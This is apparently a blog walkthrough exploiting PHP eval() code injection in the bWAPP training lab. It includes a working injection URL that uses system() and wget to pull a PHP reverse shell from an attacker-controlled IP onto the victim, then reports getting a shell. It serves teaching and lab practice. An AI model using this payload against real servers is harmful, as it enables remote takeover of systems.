PHP Code Injection

PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine. This vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code.
As you can see the message is showing in the URL, we can manipulate it

Now how can we exploit this?
Using the PHP system module, we can execute any system commands and get shell
Now to get shell we cannot directly run nc or any one-liner, in alternate to that we can upload a php-reverse shell and execute it using this RCE.
First host your php payload,
Then download it into the victim’s machine
192.168.140.138/bWAPP/phpi.php?message="a";system("wget http://192.168.140.136/teck-nc.php -O /tmp/teck.php")

Our file has been uploaded successfully now let’s try to trigger that file and get reverse shell.
And we got the shell.

~ Hack the World and Stay Noob

Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram

Comments

Related Posts

DIVA - Binary From Hell 😈 22 Aug 2020

DIVA - Environment setup 15 Aug 2020

DIVA - Insecure Logging 15 Aug 2020